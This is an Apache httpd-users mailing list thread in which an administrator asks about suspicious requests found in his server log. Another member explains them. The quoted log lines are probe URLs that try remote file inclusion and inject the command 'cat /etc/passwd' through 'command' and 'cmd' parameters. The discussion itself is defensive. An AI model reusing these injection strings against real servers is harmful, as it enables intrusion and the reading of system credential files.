httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From rahul bhola <rb1223334...@gmail.com>
Subject Re: [users@httpd] Possible exploit?
Date Wed, 12 Feb 2014 16:43:49 GMT
because of HTTP Response 302 a safe bet would be to say he didnt get
anything still i would recommend you to sanitize the data u get from
parameter command and cmd.
Also simply go to the url to see what he saw


On Wed, Feb 12, 2014 at 9:58 PM, Knute Johnson <apache@knutejohnson.com>wrote:

> On 2/12/2014 08:04, rahul bhola wrote:
>
>> in first and last casehe was checking if it is possible to pass shell
>> commands throught command or cmd parameter.not sure on second one but it
>> looks like he was testing for unsanitized url redirection vul.
>>
>>
>> On Wed, Feb 12, 2014 at 9:28 PM, Knute Johnson <apache@knutejohnson.com
>> <mailto:apache@knutejohnson.com>> wrote:
>>
>>     I found the following in my log this morning.  Does anybody know
>>     what it really means?  Thanks.
>>
>>       A total of 3 possible successful probes were detected (the
>>     following URLs
>>       contain strings that match one or more of a listing of strings that
>>       indicate a possible exploit):
>>
>>
>>     /user.php?caselist[bad_file.__txt][path]=http://www.google._
>> _com/humans.txt?&command=cat%__20/etc/passwd
>>     <http://www.google.com/humans.txt?&command=cat%20/etc/passwd> HTTP
>>     Response 302
>>
>>     /sid=__XXXXXXXXXXXXXXXXXXXXXXXXXXXX&__shopid=http://www.google.com/
>> __humans.txt
>>     <http://www.google.com/humans.txt>? HTTP Response 302
>>
>>     /gepi/gestion/savebackup.php?__filename=http://www.google.__
>> com/humans.txt?&cmd=cat/etc/__passwd
>>
>>     <http://www.google.com/humans.txt?&cmd=cat/etc/passwd> HTTP Response
>> 302
>>
>>
>>     --
>>
>>     Knute Johnson
>>
>>     ------------------------------__----------------------------
>> --__---------
>>     To unsubscribe, e-mail: users-unsubscribe@httpd.__apache.org
>>     <mailto:users-unsubscribe@httpd.apache.org>
>>
>>     For additional commands, e-mail: users-help@httpd.apache.org
>>     <mailto:users-help@httpd.apache.org>
>>
>>
>>
>>
>>
>> --
>> Rahul Bhola
>> B.E.
>> computers
>> Core Member
>> Department of backstage
>> Bits Pilani KK Birla Goa Campus
>>
>
> So you think he was trying to get the content of my passwd file?  So what
> would that get him?
>
> Is it possible to do this myself to see what he could have gotten?
>
> Thanks,
>
>
> --
>
> Knute Johnson
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
>
>


-- 
Rahul Bhola
B.E.
computers
Core Member
Department of backstage
Bits Pilani KK Birla Goa Campus

Mime
View raw message